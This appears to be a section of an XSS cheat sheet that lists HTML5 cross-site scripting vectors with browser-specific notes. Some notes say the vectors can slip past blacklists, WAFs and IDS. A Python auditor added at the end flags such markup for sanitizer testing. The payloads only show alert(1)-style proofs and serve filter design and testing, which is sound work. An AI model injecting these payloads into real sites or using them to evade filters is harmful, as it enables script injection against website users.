HTML5 Vectors

A vector demonstrating the HTML5 "form" and "formaction" attributes, which let a button placed outside the actual form hijack its submission.

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

This vector uses an input element with autofocus to call its own focus event handler - no user interaction required.

<input onfocus=write(1) autofocus>

Here we have two HTML input elements competing for the focus - and one executing JavaScript on losing its focus.

<input onblur=write(1) autofocus><input autofocus>

Opera 10.5+ allows using poster attributes in combination with javascript: URIs. This bug has been fixed in Opera 11.

<video poster=javascript:alert(1)//></video>

This vector triggers an onscroll event executing JavaScript on <BODY> due to an autofocus on an <INPUT> way further down the page.

<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.

<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>

Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags.

<video><source onerror="alert(1)">

Firefox 3.5+ allows error handlers in <VIDEO> tags when applied with a <SOURCE> tag. The same works for <AUDIO> tags.

<video onerror="alert(1)"><source></source></video>

A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.

<form><button formaction="javascript:alert(1)">X</button>

All browsers besides Internet Explorer 9 and older support the "oninput" event handler on form elements like the given <INPUT>. The event works on the form elements themselves, on the surrounding form, and on the <BODY> and <HTML> tags as well.

<body oninput=alert(1)><input autofocus>

The <DETAILS> element fires an "ontoggle" event without user interaction on modern Blink-based browsers. This can be abused to bypass blacklists as the event-tag combination is not very well known.

<details open ontoggle="alert(1)">

The <VIDEO> element fires an "onratechange" event without user interaction on Firefox, even if no actual value for the "src" attribute is given. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is rather uncommon and little known.

<video src onratechange="alert(1)">
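The recurring lesson of the vectors above is that a blacklist of known handler names and tags will miss the next uncommon combination (ontoggle, onratechange, onforminput). The added example below is not part of the original page: it is a small allow-list style auditor, built on Python's standard html.parser, that flags any "on*" attribute, any javascript: URI in a URI-bearing attribute, the form/formaction attributes that detach a button from its form, and autofocus, which lets several of these vectors fire without user interaction. The sample inputs are constructed from the vectors on this page.

```python
from html.parser import HTMLParser
import re

# Constructed sample: vectors from this page, as fed to a sanitizer under test.
PAGE_VECTORS = [
    '<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>',
    '<input onfocus=write(1) autofocus>',
    '<video poster=javascript:alert(1)//></video>',
    '<details open ontoggle="alert(1)">',
    '<video src onratechange="alert(1)">',
]

# Attributes that take a URI and therefore a javascript: scheme.
URI_ATTRS = {"href", "src", "poster", "formaction", "action"}
# Attributes that let a control act on a form it is not nested in.
FORM_ATTRS = {"form", "formaction"}
# Leading whitespace/control characters are tolerated by browsers before the scheme.
JS_SCHEME = re.compile(r"^[\s\x00-\x1f]*javascript:", re.IGNORECASE)


class HTML5VectorAuditor(HTMLParser):
    """Collects every (tag, attribute, reason) an allow-list sanitizer must drop.

    Event handlers are matched by the "on" prefix rather than by a list of known
    names, so ontoggle and onratechange are caught exactly like onerror and onfocus.
    html.parser lower-cases tag and attribute names for us.
    """

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name, "event handler attribute"))
            elif name in FORM_ATTRS and tag in {"button", "input"}:
                self.findings.append((tag, name, "form hijacking from outside <form>"))
            if name in URI_ATTRS and value is not None and JS_SCHEME.match(value):
                self.findings.append((tag, name, "javascript: URI"))
            if name == "autofocus":
                self.findings.append((tag, name, "fires focus/blur without user interaction"))


def audit(markup):
    """Return the list of findings for a fragment of HTML."""
    parser = HTML5VectorAuditor()
    parser.feed(markup)
    parser.close()
    return parser.findings


def is_safe(markup):
    return not audit(markup)
```

Run it against a sanitizer's output rather than its input: any finding on the output means the sanitizer let a live vector through.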
